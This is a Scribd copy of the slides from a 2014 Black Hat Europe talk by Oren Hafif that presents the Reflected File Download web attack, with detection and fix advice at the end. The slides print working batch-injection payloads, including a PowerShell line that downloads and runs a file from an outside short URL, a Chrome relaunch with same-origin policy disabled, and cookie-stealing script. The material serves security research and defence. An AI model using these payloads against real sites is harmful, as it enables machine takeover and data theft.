Scribd Logo
Upload

Welcome to Scribd!

  • 16 views

    Eu 14 Hafif Reflected File Download A New Web Attack Vector

    Uploaded by

    Michael Michael
    The document describes a new web attack called Reflected File Download (RFD) that allows attackers to gain complete control over a victim's machine by tricking them into downloading an executable file from a trusted domain like Google or Bing without any warnings. RFD works by reflecting user input back in the response and manipulating the filename to bypass download warnings on Windows 7 and execute malicious code immediately without user consent. The talk discusses how RFD works, its security implications, and how to detect and prevent such attacks.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd

    Eu 14 Hafif Reflected File Download A New Web Attack Vector

    Uploaded by

    Michael Michael
    16 views93 pages
    The document describes a new web attack called Reflected File Download (RFD) that allows attackers to gain complete control over a victim's machine by tricking them into downloading an executable file from a trusted domain like Google or Bing without any warnings. RFD works by reflecting user input back in the response and manipulating the filename to bypass download warnings on Windows 7 and execute malicious code immediately without user consent. The talk discusses how RFD works, its security implications, and how to detect and prevent such attacks.

    Original Description:

    Web related

    Original Title

    Eu 14 Hafif Reflected File Download a New Web Attack Vector

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    The document describes a new web attack called Reflected File Download (RFD) that allows attackers to gain complete control over a victim's machine by tricking them into downloading an executable file from a trusted domain like Google or Bing without any warnings. RFD works by reflecting user input back in the response and manipulating the filename to bypass download warnings on Windows 7 and execute malicious code immediately without user consent. The talk discusses how RFD works, its security implications, and how to detect and prevent such attacks.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    16 views93 pages

    Eu 14 Hafif Reflected File Download A New Web Attack Vector

    Uploaded by

    Michael Michael
    The document describes a new web attack called Reflected File Download (RFD) that allows attackers to gain complete control over a victim's machine by tricking them into downloading an executable file from a trusted domain like Google or Bing without any warnings. RFD works by reflecting user input back in the response and manipulating the filename to bypass download warnings on Windows 7 and execute malicious code immediately without user consent. The talk discusses how RFD works, its security implications, and how to detect and prevent such attacks.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    of 93

    Reflected File Download

    A New Web Attack Vector

    Oren Hafif
    Security Researcher
    Trustwave Spiderlabs
    Download executable files
    from
    Google.com & Bing.com
    File executes, No warnings
    and
    Gains control over the Machine
    Reflected File Download

    RFD is a web attack vector that enables


    attackers to gain complete control over a victims
    machine by virtually downloading a file from a
    trusted domain.
    Get your hands on that whitepaper!
    @orenhafif
    @spiderlabs
    blog.spiderlabs.com
    2 ½ Months Ago…
    Security Professionals

    http://thechive.com/2009/02/14/these-
    people-exist-part-3-25-photos/
    Two Major Conferences
    E v e r y s u m m e r i n Ve g a s

    Black Hat Competing


    Conference
    Name
    Security Professionals That’s Me!
    It is
    Wow! scary!

    Reflected File Download


    uses the dark side of the
    force!

    http://thechive.com/2009/02/14/these-
    people-exist-part-3-25-photos/
    There is nothing more joyful for a security professional…

    …than being told that you are RIGHT


    by other security professionals!
    Reflected File Download
    A New Web Attack Vector

    Oren Hafif
    Security Researcher
    Trustwave Spiderlabs
    Agenda
    • Objectives
    • Understand RFD
    – What?
    – Why?
    – How?
    • Advanced Exploitation
    Agenda - What is RFD?
    • DEMO!
    • Analysis of the demo
    Agenda – Why RFD?
    • Motivation
    • RFD exploitation capabilities and implications
    • Trust Model for web downloads
    Agenda – How RFD?
    • How to Detect?
    • How to Exploit?
    • How to Prevent?

    [ ] #78 – add cat pictures to slides


    About Myself…

    > Age.round(28)=30
    Age.round(27)=25
    About Myself…
    About Myself…
    OBJECTIVES
    BREAKERS
    DETECT
    AND
    REPORT
    RFD ISSUES
    DEFENDERS
    PREVENT
    AND BLOCK
    RFD
    ATTACKS
    BUILDERS
    DEVELOP
    SECURE
    APIS and
    WEB APPS
    Windows Calculator
    DEMO
    Demo: Let’s talk about it…
    • User clicked on a valid link to Google.com
    • A malicious file got downloaded from Google.com
    • The file executes immediately, once clicked.
    • Windows calculator popped up (Pwned)!
    No upload takes place…
    A file is being downloaded…

    Uploadless Downloads!
    RFD Implications (Why?)
    • Gain full control over the user’s machine
    • Confidentiality – steal everything, install trojans
    • Availability – delete everything, use cryptolockers
    • Integrity – impersonate the user/website.

    • Chrome: Get back into the Browser with Super Powers.


    HOW DO WE TRUST DOWNLOADS?
    The Web Model of Trust
    The Web Model of Trust
    The Web Model of Trust
    How do we trust downloads?

    TRUST?
    WHICH ONE WOULD YOU TRUST?
    WHAT MAKES YOU TRUST A DOWNLOAD?
    Referrer
    19%

    Host
    81%
    4 OUT OF 5
    WOULD TRUST DOWNLOADS
    BASED ON THE HOSTING DOMAIN

    RFD uses such trust to do evil!


    RFD REAL EXAMPLE, STEP BY STEP…
    Google Autocomplete
    http://googlefails.tumblr.com/
    http://googlefails.tumblr.com/
    Google Autocomplete
    https://google.com/s?q=rfd

    User Web Server


    HTTP/1.1 200 OK
    Content-Type: application/json;
    Content-Disposition: attachment
    Content-Length: 12…
    {"results":["q", "rfd","I love rfd"]}
    https://google.com/s?q=rfd"

    User Web Server


    HTTP/1.1 200 OK
    Content-Type: application/json;
    Content-Disposition: attachment
    Content-Length: 12…
    {"results":["q", "rfd\"","I love rfd"]}
    It’s all about the context…
    It’s all about the context…
    https://google.com/s?q=rfd"||calc||

    User Web Server


    HTTP/1.1 200 OK
    Content-Type: application/json;
    Content-Disposition: attachment
    Content-Length: 12…
    {"results":["q", "rfd\"||calc||","I love
    rfd"]}
    {"results":["q", "rfd\"||calc||","I love rfd"]}
    O
    {"results":["q",
    F A L S E "rfd\"||calc||","I love rfd"]}
    R
    {"results":["q", "rfd\"||calc||","I love rfd"]}
    O
    {"results":["q", "rfd\"||calc||","I
    TRUE
    R
    love
    I G N Orfd"]}
    RED
    https://google.com/s?q=rfd"||calc||

    User Web Server


    HTTP/1.1 200 OK
    Content-Type: application/json;
    Content-Disposition: attachment
    Content-Length: 12…
    {"results":["q", "rfd\"||calc||","I love
    rfd"]}
    https://google.com/s;/setup.bat;?q=rfd"||calc||

    User Web Server


    HTTP/1.1 200 OK Setup.bat

    Content-Type: application/json;
    Content-Disposition: attachment
    Content-Length: 12…
    {"results":["q", "rfd\"||calc||","I love
    rfd"]}
    https://google.com/s;/setup.bat;?q=rfd"||calc||

    User Web Server


    HTTP/1.1 200 OK Setup.bat

    Content-Type: application/json;
    Content-Disposition: attachment
    Content-Length: 12…
    {"results":["q", "rfd\"||calc||","I love
    rfd"]}
    https://google.com/s;/setup.bat;?q=rfd"||calc||

    User Web Server


    Setup.bat HTTP/1.1 200 OK
    Content-Type: application/json;
    Content-Disposition: attachment
    Content-Length: 12…
    {"results":["q", "rfd\"||calc||","I love
    rfd"]}
    https://google.com/s;/setup.bat;?q=rfd"||calc||

    User Web Server


    Setup.bat HTTP/1.1 200 OK
    Content-Type: application/json;
    Content-Disposition: attachment
    Content-Length: 12…
    {"results":["q", "rfd\"||calc||","I love
    rfd"]}
    How come there are no warnings?
    WINDOWS 7
    SECURITY FEATURE BYPASS
    How come there are no warnings?
    • Windows 7 bypass for batch files
    • Works for the “.bat” and “.cmd”
    extensions.
    • Completely disables all warnings!
    • Files execute immediately
    Its all in the filename!
    • setup
    • install
    • update
    VeryVeryBadUpdate.bat
    RFD
    RFD REQUIREMENTS
    • REFLECTED – some input is reflected to
    the response body. --> shell commands
    • FILE – attacker can tamper the filename.
    • DOWNLOAD – the response is
    downloaded.
    Where can we find RFD?
    • Any response with reflected input and
    less common Content-Type.
    • JSON APIs and JSONP are extremely
    vulnerable.
    • URL Mapping is Permissive (‘/’ , ‘;’)
    Which Exploit Should I Use?
    • Use “.bat” and “.cmd” extensions for batch.
    • Use “.js”, “jse”, ”.vbs”, ”.wsh”, “.vbe”, “.wsf”,
    “.hta” for Windows Script Host fun.
    • You can exploit other programs! E.g. “.pdf”
    Batch tricks
    • & - Command Separator
    • && - AND
    • | - Redirect Output
    • || - OR
    • > < >> << - Stream Redirects
    • New Line
    Force files to DOWNLOAD?
    • Content-Disposition headers
    • Chrome & Opera can force downloads using
    <a download href=“http://target/setup.bat”>
    • Different Browser behavior! (Content-Types)
    Force files to download?
    ADVANCED EXPLOITATION
    • Do as you wish… you are running cmds in OS.
    • Use PowerShell to download the rest of the
    payload! (You can even ask for admin rights)
    "||powershell (New-Object
    Net.Webclient).DownloadFile("http://pi.vu/B2jC","5.bat")|md
    ||start /min 5

    • Get back to Chrome with Super Powers!


    How many command-line options?

    Google Chrome
    OVER NINE HUNDREEEEDD!
    Let’s use just 2 out of 973…
    • --disable-web-security
    shuts down same-origin-policy!
    • --disable-popup-blocker
    well…
    • Result: one big mess! YOU OWN CHROME!
    1 http://www.google.com/s;/ChromeSetup.bat;?q=payload&...

    User ChromeSetup.bat 2 Google


    Web Server
    3
    Windows Batch File

    User
    4

    5 http://attacker-website.com/

    6
    User <script> Attacker
    win = open(“http://mail.google.com”);
    alert(win.document.body); // granted
    Web Server
    alert(win.document.cookie); //granted
    Let’s create an exploit!
    1 2 3 4 5 6 7
    ["\"||taskkill /F /IM ch*|md||start chrome pi.vu/B2jj --disable-web-security
    --disable-popup-blocking||",[],{"t":{"bpc":false,"tlw":false},"q":"Xwxg4gmQoA9Zn6E2DjScDWXR
    zbQ"}] 8

    1 Result: '["\"' is not recognized as an internal or external command, operable program or batch file.
    2 || is the OR operator, since the left hand side failed, the right hand side will be executed.
    3 Killing all tasks with names starting with “ch” – targeting “chrome.exe”. Chrome will be closed.
    4 | redirects the input to the next command
    5 The md command creates new directories. Its only use here is to cause the expression to be false.
    6 || same trick as before, continuing the execution since the last expression was false.
    7 Starting Chrome at the attacker’s URL without Web security and popup blocking.
    8 || this time Chrome was started successfully, so the rest of the commands are ignored.
    DEMO
    Stealing emails from GMAIL
    DEMO
    Cross-Social Network RFD Worm
    DEMO
    Cross-Social Network RFD Worm
    DEMO
    Cross-Social Network RFD Worm
    DEMO
    Cross-Social Network RFD Worm
    How to Fix RFD?
    • Use exact URL mapping – no wildcards!
    • Do not escape! Encode! \” \u0022 or \x22
    • Add Content-Disposition w/ filename att.:
    Content-Disposition: attachment; filename=1.txt
    • Require Custom Headers for all APIs
    • If possible use CSRF tokens
    How to Fix RFD - more?
    • Whitelist Callbacks – reflected by default!
    • Enforce XSSI mitigation like for(;;);
    • Never include user input in API usage errors.
    • Remove support for Path Parameters
    (semicolons)
    • X-Content-Type-Options: nosniff
    Summary
    • Your site can be used to attack users!
    • Attackers get full control of victims machine.
    • A file is downloaded without being uploaded.
    • Advanced exploitation (chrome/powershell)
    and bypasses (windows).
    • Fix it! I am so scared!
    Who is responsible?
    “We recognize that the address bar is the only
    reliable security indicator in modern browsers.”

    The Google Vulnerability Reward Program Rules


    THANK YOU!
    Follow Me: @orenhafif
    Follow Us: @spiderlabs

    You might also like